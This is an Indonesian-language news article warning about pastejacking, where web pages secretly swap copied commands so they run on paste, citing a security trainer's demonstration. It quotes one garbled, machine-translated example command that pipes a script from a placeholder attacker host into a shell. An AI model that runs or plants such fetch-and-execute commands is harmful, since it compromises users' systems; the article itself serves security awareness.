- Kita semua menyalin dan menempel dari internet setiap hari tanpa benar-benar mengetahui risikonya.
- Seorang pakar keamanan meluangkan waktu untuk menunjukkan kepada semua orang skenario terburuk saat melakukan ini.
- Menempelkan perintah yang Anda dapatkan dari internet ke terminal Anda adalah cara cepat untuk diretas
- Perintah yang Anda pikir Anda tempelkan ke terminal Anda sebenarnya adalah kode berbahaya.
Memang benar bahwa kita hidup di era di mana kecepatan adalah segalanya, dan mendapatkan hasil yang cepat adalah yang terpenting. Namun, hanya sedikit orang yang benar-benar berhenti sejenak dan memikirkan akibatnya.
Setiap hari, jutaan programmer, admin, dan peneliti keamanan melakukan tugas sederhana seperti menyalin dan menempelkan perintah dari halaman web langsung ke konsol di PC mereka.
Meskipun banyak yang bahkan tidak memikirkan hal ini, implikasinya lebih besar dan lebih berbahaya daripada yang mungkin Anda pikirkan pada awalnya, terutama jika Anda menyimpan data sensitif atau berharga.
Seorang pakar keamanan terkenal meluangkan waktu untuk berbagi apa yang sebenarnya bisa terjadi jika Anda menyalin+menempel konten dari halaman web.
Salin + Tempel adalah cara mudah untuk benar-benar diretas
Gabriel Friedlander, yang merupakan pendiri platform pelatihan kesadaran keamanan Wizer, membuka penutup skema yang akan membuat Anda berpikir dua kali sebelum menyalin dan menempelkan perintah dari halaman web.
Menyalin dan menempel konten dari internet telah menjadi sangat umum saat ini, bahkan tidak ada yang memikirkannya.
Namun, Friedlander memperingatkan bahwa beberapa halaman web lebih menipu daripada yang mungkin disadari pada awalnya, dan apa yang Anda pikir Anda salin darinya sangat berbeda dari apa yang sebenarnya Anda lakukan.
Dan bagian yang lebih buruk dari semua ini adalah bahwa, tanpa pengetahuan atau bimbingan yang diperlukan, para korban baru menyadari kesalahan mereka setelah merekatkan teks, dan pada saat itu mungkin sudah terlambat.
Analis keamanan juga merancang tes kecil untuk pembaca blognya, agar orang benar-benar dapat memahami betapa mudahnya bagi Anda untuk secara enggan membuka pintu bagi penjahat dunia maya.
Dia memberikan perintah yang dimaksudkan untuk disalin, tetapi kebenaran terkait hanya terungkap ketika Anda menempelkan teks dan melihat apa yang sebenarnya Anda perkenalkan di pengaturan Anda.
Setelah menyalin perintah yang ditunjukkan pada tangkapan layar di atas, hasil menempelnya akan mengejutkan Anda, karena jauh dari apa yang Anda pikir Anda duplikasi.
keriting http://attacker-domain: 8000/shell.sh | SHSelain perintah yang sama sekali berbeda yang ada di clipboard Anda, karakter baris baru (atau kembali) di akhir itu berarti contoh di atas akan dieksekusi segera setelah ditempelkan langsung ke Linux terminal.
Jadi, Anda sebaiknya lebih menyadari apa yang sebenarnya terjadi dan memperlakukan ini sebagai bahaya keamanan yang serius. Kami tidak mengatakan semua situs web menyembunyikan konten berbahaya, tetapi ada baiknya mempertimbangkan hal ini.
Pernahkah Anda diretas karena menempelkan perintah cerdik ke terminal Anda? Bagikan pengalaman Anda dengan kami di bagian komentar di bawah.
